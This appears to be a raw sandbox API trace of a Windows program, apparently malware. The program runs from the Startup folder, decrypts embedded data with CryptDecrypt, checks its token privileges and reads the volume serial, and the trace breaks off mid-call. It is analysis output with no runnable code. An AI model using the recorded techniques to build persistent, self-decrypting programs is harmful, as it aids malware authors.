\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x34\xbf\x70\x34\xd4\xf9\x33\x01\x8f\x7b\x12", lpUsedDefaultChar=0x0) returned 256 [0129.123] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f728, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x42 [0129.123] GetLastError () returned 0x0 [0129.123] SetLastError (dwErrCode=0x0) [0129.123] GetLastError () returned 0x0 [0129.123] SetLastError (dwErrCode=0x0) [0129.123] GetLastError () returned 0x0 [0129.123] SetLastError (dwErrCode=0x0) [0129.123] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.124] SetLastError (dwErrCode=0x0) [0129.124] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.125] GetLastError () returned 0x0 [0129.125] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.126] GetLastError () returned 0x0 [0129.126] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.127] SetLastError (dwErrCode=0x0) [0129.127] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x4b) returned 0x2fb1788 [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.133] GetLastError () returned 0x0 [0129.133] SetLastError (dwErrCode=0x0) [0129.134] GetLastError () returned 0x0 [0129.134] SetLastError (dwErrCode=0x0) [0129.134] GetLastError () returned 0x0 [0129.134] SetLastError (dwErrCode=0x0) [0129.134] GetLastError () returned 0x0 [0129.134] SetLastError (dwErrCode=0x0) [0129.134] GetLastError () returned 0x0 [0129.134] SetLastError (dwErrCode=0x0) [0129.134] GetLastError () returned 0x0 [0129.134] SetLastError (dwErrCode=0x0) [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x98) returned 0x2fb17e0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1f) returned 0x2fb1880 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x28) returned 0x2fb18a8 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x37) returned 0x2fb18d8 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x3c) returned 0x2fb1918 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x31) returned 0x2fb1960 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x14) returned 0x2fb19a0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x24) returned 0x2fb19c0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0xd) returned 0x2fb19f0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x17) returned 0x2fb1a08 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x2b) returned 0x2fb1a28 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x15) returned 0x2fb1a60 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x17) returned 0x2fb1a80 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x22) returned 0x2fb1aa0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0xe) returned 0x2fb1ad0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0xc2) returned 0x2fb1ae8 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x3e) returned 0x2fb1bb8 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1b) returned 0x2fb1c00 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1d) returned 0x2fb1c28 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x48) returned 0x2fb1c50 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x12) returned 0x2fb1ca0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x18) returned 0x2fb1cc0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1b) returned 0x2fb1ce0 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x24) returned 0x2fb1d08 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x29) returned 0x2fb1d38 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1e) returned 0x2fb1d70 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x6b) returned 0x2fb1d98 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x17) returned 0x2fb1e10 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x14) returned 0x2fb1e30 [0129.134] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0xf) returned 0x2fb1e50 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x16) returned 0x2fb1e68 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x28) returned 0x2fb1e88 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x27) returned 0x2fb1eb8 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x12) returned 0x2fb1ee8 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x21) returned 0x2fb1f08 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x10) returned 0x2fb1f38 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1c) returned 0x2fb1f50 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x12) returned 0x2fb1f78 [0129.135] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb0fd0 | out: hHeap=0x2fb0000) returned 1 [0129.135] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.135] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x80) returned 0x2fb0fd0 [0129.135] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1281f6) returned 0x0 [0129.136] RtlSizeHeap (HeapHandle=0x2fb0000, Flags=0x0, MemoryPointer=0x2fb0fd0) returned 0x80 [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.177] SetLastError (dwErrCode=0x0) [0129.185] GetLastError () returned 0x0 [0129.185] SetLastError (dwErrCode=0x0) [0129.185] GetLastError () returned 0x0 [0129.185] SetLastError (dwErrCode=0x0) [0129.185] GetLastError () returned 0x0 [0129.185] SetLastError (dwErrCode=0x0) [0129.185] GetLastError () returned 0x0 [0129.186] SetLastError (dwErrCode=0x0) [0129.186] GetLastError () returned 0x0 [0129.186] SetLastError (dwErrCode=0x0) [0129.186] GetLastError () returned 0x0 [0129.186] SetLastError (dwErrCode=0x0) [0129.186] GetLastError () returned 0x0 [0129.186] SetLastError (dwErrCode=0x0) [0129.186] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x30) returned 0x2fb1f98 [0129.186] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x2420) returned 0x2fb1fd0 [0129.186] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x174) returned 0x2fb1058 [0129.186] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x10) returned 0x2fb11d8 [0129.186] CryptAcquireContextW (in: phProv=0x12fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12fcf0*=0x15acf60) returned 1 [0129.238] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f960 | out: phKey=0x133f960*=0x15a90a8) returned 1 [0129.238] CryptSetKeyParam (hKey=0x15a90a8, dwParam=0x1, pbData=0x133f948, dwFlags=0x0) returned 1 [0129.238] CryptDecrypt (in: hKey=0x15a90a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb11d8, pdwDataLen=0x133f914 | out: pbData=0x2fb11d8, pdwDataLen=0x133f914) returned 1 [0129.238] CryptDestroyKey (hKey=0x15a90a8) returned 1 [0129.238] GetTickCount () returned 0xdf92 [0129.238] GetLastError () returned 0x0 [0129.238] SetLastError (dwErrCode=0x0) [0129.238] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x133f984, cchData=32 | out: lpLCData="\x03") returned 16 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x1c) returned 0x2fb11f0 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x1c) returned 0x2fb1218 [0129.239] GetVersion () returned 0x23f00206 [0129.239] GetCurrentProcess () returned 0xffffffff [0129.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x133f96c | out: TokenHandle=0x133f96c*=0x1f0) returned 1 [0129.239] GetTokenInformation (in: TokenHandle=0x1f0, TokenInformationClass=0x14, TokenInformation=0x133f964, TokenInformationLength=0x4, ReturnLength=0x133f968 | out: TokenInformation=0x133f964, ReturnLength=0x133f968) returned 1 [0129.239] CloseHandle (hObject=0x1f0) returned 1 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x20) returned 0x2fb1240 [0129.239] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f860, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f8c8 | out: phKey=0x133f8c8*=0x15a92a8) returned 1 [0129.239] CryptSetKeyParam (hKey=0x15a92a8, dwParam=0x1, pbData=0x133f8b0, dwFlags=0x0) returned 1 [0129.239] CryptDecrypt (in: hKey=0x15a92a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb1240, pdwDataLen=0x133f87c | out: pbData=0x2fb1240, pdwDataLen=0x133f87c) returned 1 [0129.239] CryptDestroyKey (hKey=0x15a92a8) returned 1 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1e) returned 0x2fb1268 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x1e) returned 0x2fb1290 [0129.239] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x90) returned 0x2fb12b8 [0129.239] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f838, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f8a0 | out: phKey=0x133f8a0*=0x15a92a8) returned 1 [0129.239] CryptSetKeyParam (hKey=0x15a92a8, dwParam=0x1, pbData=0x133f888, dwFlags=0x0) returned 1 [0129.239] CryptDecrypt (in: hKey=0x15a92a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb12b8, pdwDataLen=0x133f854 | out: pbData=0x2fb12b8, pdwDataLen=0x133f854) returned 1 [0129.239] CryptDestroyKey (hKey=0x15a92a8) returned 1 [0129.239] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb12b8 | out: hHeap=0x2fb0000) returned 1 [0129.239] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2fb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.239] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1290 | out: hHeap=0x2fb0000) returned 1 [0129.239] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1240 | out: hHeap=0x2fb0000) returned 1 [0129.239] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x133f908, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x133f908*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 